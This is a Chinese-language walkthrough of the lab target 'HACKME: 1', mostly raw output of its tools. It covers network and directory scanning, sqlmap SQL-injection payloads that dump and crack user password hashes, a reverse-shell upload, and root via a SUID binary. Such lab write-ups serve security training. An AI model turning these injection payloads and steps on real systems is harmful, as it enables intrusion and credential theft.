红队打靶练习:HACKME: 1

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.138  00:50:56:3f:82:5b       VMware, Inc.
192.168.12.254  00:50:56:e4:dd:fa       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.341 seconds (109.35 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.138  00:50:56:3f:82:5b      1      60  VMware, Inc.
 192.168.12.254  00:50:56:e4:dd:fa      1      60  VMware, Inc.


3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.1
Host is up (0.0049s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000082s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.138
Host is up (0.000082s latency).
MAC Address: 00:50:56:3F:82:5B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000048s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.41 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.138 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.138
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:50:56:3F:82:5B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,80 192.168.12.138 --min-rate
10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:30 CST
Nmap scan report for 192.168.12.138
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
|   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_  256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:50:56:3F:82:5B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.12.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80 192.168.12.138 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:27 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.138
Host is up (0.00012s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /login.php: Possible admin folder
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.34 (ubuntu)'
MAC Address: 00:50:56:3F:82:5B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 54.98 seconds


4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.138 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.138
+ Target Hostname:    192.168.12.138
+ Target Port:        80
+ Start Time:         2023-12-18 15:27:44 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.34 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.34 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-18 15:27:59 (GMT8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.138
WhatWeb report for http://192.168.12.138
Status    : 200 OK
Title     : 
IP        : 192.168.12.138
Country   : RESERVED, ZZ

Summary   : Apache[2.4.34], HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], Meta-Refresh-Redirect[login.php]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.34 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.34 (Ubuntu) (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be
        used to optionally wait x seconds before reloading the
        current page or loading a new page. More info:
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

        String       : login.php

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 07:28:34 GMT
        Server: Apache/2.4.34 (Ubuntu)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 100
        Connection: close
        Content-Type: text/html; charset=UTF-8

WhatWeb report for http://192.168.12.138/login.php
Status    : 200 OK
Title     : Login
IP        : 192.168.12.138
Country   : RESERVED, ZZ

Summary   : Apache[2.4.34], Bootstrap[3.3.7], Cookies[PHPSESSID], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], PasswordField[password]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.34 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Version      : 3.3.7
        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : PHPSESSID

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.34 (Ubuntu) (from server string)

[ PasswordField ]
        find password fields

        String       : password (from field name)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 07:28:35 GMT
        Server: Apache/2.4.34 (Ubuntu)
        Set-Cookie: PHPSESSID=0ibvmsioq46c5ltsn7gd6irqjl; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 527
        Connection: close
        Content-Type: text/html; charset=UTF-8

22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))


目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.138 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,bak,html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/index.php            (Status: 200) [Size: 100]
/login.php            (Status: 200) [Size: 1245]
/register.php         (Status: 200) [Size: 1937]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.12.138/uploads/]
/welcome.php          (Status: 302) [Size: 0] [--> login.php]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.138 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.138/_23-12-18_15-42-05.txt

Target: http://192.168.12.138/

[15:42:05] Starting:
[15:42:07] 403 -  293B  - /.php
[15:42:29] 200 -    0B  - /config.php
[15:42:43] 200 -  527B  - /login.php
[15:42:44] 302 -    0B  - /logout.php  ->  login.php
[15:42:56] 200 -  594B  - /register.php
[15:42:59] 403 -  302B  - /server-status
[15:42:59] 403 -  303B  - /server-status/
[15:43:08] 301 -  318B  - /uploads  ->  http://192.168.12.138/uploads/
[15:43:08] 200 -  458B  - /uploads/

3、dirb
┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.138

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Dec 18 15:52:28 2023
URL_BASE: http://192.168.12.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                      GENERATED WORDS: 4612

---- Scanning URL: http://192.168.12.138/ ----
                                                                      + http://192.168.12.138/index.php (CODE:200|SIZE:100)
+ http://192.168.12.138/server-status (CODE:403|SIZE:302)
                                                                      ==> DIRECTORY: http://192.168.12.138/uploads/

---- Entering directory: http://192.168.12.138/uploads/ ----
                                                                      (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)


-----------------
END_TIME: Mon Dec 18 15:52:30 2023
DOWNLOADED: 4612 - FOUND: 2

WEB

红队打靶练习:HACKME: 1_第1张图片


红队打靶练习:HACKME: 1_第2张图片


创建个账号登陆进入!

红队打靶练习:HACKME: 1_第3张图片



测试sql注入,但是没有回显,也不能命令执行。目录也没有什么东西,我们尝试用sqlmap跑一下!

sqlmap

1、爆库
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --dbs --level=3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:43:01 /2023-12-18/

[16:43:01] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:43:01] [INFO] testing connection to the target URL
[16:43:01] [INFO] testing if the target URL content is stable
[16:43:02] [INFO] target URL content is stable
[16:43:02] [INFO] testing if POST parameter 'search' is dynamic



......




---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:43:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:43:14] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[16:43:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:43:14 /2023-12-18/

2、爆表
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.11#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:47:02 /2023-12-18/

[16:47:02] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:02] [INFO] resuming back-end DBMS 'mysql'
[16:47:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:02] [INFO] fetching tables for database: 'webapphacking'
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+

[16:47:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:47:03 /2023-12-18/

3、爆列
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users --columns
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:47:33 /2023-12-18/

[16:47:33] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:33] [INFO] resuming back-end DBMS 'mysql'
[16:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:33] [INFO] fetching columns for table 'users' in database 'webapphacking'
Database: webapphacking
Table: users
[5 columns]
+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+

[16:47:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'

[*] ending @ 16:47:33 /2023-12-18/

4、爆字段
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users -C user,pasword --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:49:41 /2023-12-18/

[16:49:41] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:49:41] [INFO] resuming back-end DBMS 'mysql'
[16:49:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:49:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:49:41] [INFO] fetching entries of column(s) '`user`,pasword' for table 'users' in database 'webapphacking'
[16:49:42] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:49:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaptih_o6x7290104/sqlmaphashes-jyiyw1xs.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:49:45] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> y
[16:49:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:49:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:49:47] [INFO] starting 2 processes
[16:49:50] [INFO] cracked password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'
[16:49:54] [INFO] cracked password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'
[16:49:55] [INFO] cracked password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'
[16:49:58] [INFO] cracked password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'
[16:50:01] [INFO] using suffix '1'
[16:50:15] [INFO] using suffix '123'
[16:50:20] [INFO] cracked password 'woll123' for hash '2a3ac5fec79fdbfe874a48aa01069de8'
Database: webapphacking
Table: users
[7 entries]
+------------+---------------------------------------------+
| user       | pasword                                     |
+------------+---------------------------------------------+
| user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)          |
| test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| woll       | 2a3ac5fec79fdbfe874a48aa01069de8 (woll123)  |
+------------+---------------------------------------------+

六个用户

user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    
user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) 
user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) 
test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) 
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)          
test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) 

  
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)

这个用户应该就是超级管理员的用户了!

文件上传&反弹shell

红队打靶练习:HACKME: 1_第4张图片


我们使用超级管理员登录!发现一个上传页面!
我们上传一个反弹shell木马!

红队打靶练习:HACKME: 1_第5张图片




提权

1、系统信息收集
$ python2 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackme:/$ uname -a
uname -a
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

www-data@hackme:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.10
Release:        18.10
Codename:       cosmic

www-data@hackme:/$ cat /etc/passwd | grep "home" | grep -v nologin
cat /etc/passwd | grep "home" | grep -v nologin
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash
www-data@hackme:/$

www-data@hackme:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@hackme:/$

www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core/16202/bin/mount
/snap/core/16202/bin/ping
/snap/core/16202/bin/ping6
/snap/core/16202/bin/su
/snap/core/16202/bin/umount
/snap/core/16202/usr/bin/chfn
/snap/core/16202/usr/bin/chsh
/snap/core/16202/usr/bin/gpasswd
/snap/core/16202/usr/bin/newgrp
/snap/core/16202/usr/bin/passwd
/snap/core/16202/usr/bin/sudo
/snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16202/usr/lib/openssh/ssh-keysign
/snap/core/16202/usr/lib/snapd/snap-confine
/snap/core/16202/usr/sbin/pppd
/snap/core22/1033/usr/bin/chfn
/snap/core22/1033/usr/bin/chsh
/snap/core22/1033/usr/bin/gpasswd
/snap/core22/1033/usr/bin/mount
/snap/core22/1033/usr/bin/newgrp
/snap/core22/1033/usr/bin/passwd
/snap/core22/1033/usr/bin/su
/snap/core22/1033/usr/bin/sudo
/snap/core22/1033/usr/bin/umount
/snap/core22/1033/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1033/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount

2、本地提权
递归搜索可利用文件  hackme用户

www-data@hackme:/home$ ls -alR hackme
ls -alR hackme
hackme:
total 48
drwxr-xr-x 5 hackme hackme 4096 Mar 25  2019 .
drwxr-xr-x 4 root   root   4096 Mar 26  2019 ..
-rw------- 1 hackme hackme 5794 Mar 27  2019 .bash_history
-rw-r--r-- 1 hackme hackme  220 Sep 12  2018 .bash_logout
-rw-r--r-- 1 hackme hackme 3771 Sep 12  2018 .bashrc
drwx------ 2 hackme hackme 4096 Mar 13  2019 .cache
drwx------ 3 hackme hackme 4096 Mar 13  2019 .gnupg
drwxrwxr-x 3 hackme hackme 4096 Mar 21  2019 .local
-rw------- 1 root   root   5588 Mar 25  2019 .mysql_history
-rw-r--r-- 1 hackme hackme  807 Sep 12  2018 .profile
-rw-r--r-- 1 hackme hackme    0 Mar 13  2019 .sudo_as_admin_successful
ls: cannot open directory 'hackme/.cache': Permission denied
ls: cannot open directory 'hackme/.gnupg': Permission denied

hackme/.local:
total 12
drwxrwxr-x 3 hackme hackme 4096 Mar 21  2019 .
drwxr-xr-x 5 hackme hackme 4096 Mar 25  2019 ..
drwx------ 3 hackme hackme 4096 Mar 21  2019 share
ls: cannot open directory 'hackme/.local/share': Permission denied

递归搜索可利用文件  legacy用户

www-data@hackme:/home$ ls -alR legacy
ls -alR legacy
legacy:
total 20
drwxr-xr-x 2 root root 4096 Mar 26  2019 .
drwxr-xr-x 4 root root 4096 Mar 26  2019 ..
-rwsr--r-x 1 root root 8472 Mar 26  2019 touchmenot


3、get root
www-data@hackme:/home$ cd legacy
cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/home/legacy# cd /root
cd /root
root@hackme:/root# ls -al
ls -al
total 32
drwx------  5 root root     4096 Mar 26  2019 .
drwxr-xr-x 23 root root     4096 Mar 13  2019 ..
-rw-------  1 root www-data   54 Mar 26  2019 .bash_history
-rw-r--r--  1 root root     3106 Aug  6  2018 .bashrc
drwxr-xr-x  3 root root     4096 Mar 13  2019 .local
-rw-r--r--  1 root root      148 Aug  6  2018 .profile
drwx------  2 root root     4096 Mar 13  2019 .ssh
drwxr-xr-x  3 root root     4096 Mar 13  2019 snap

红队打靶练习:HACKME: 1_第6张图片


这个可执行程序可以执行进行提权。

你可能感兴趣的:(红队渗透靶机,网络安全)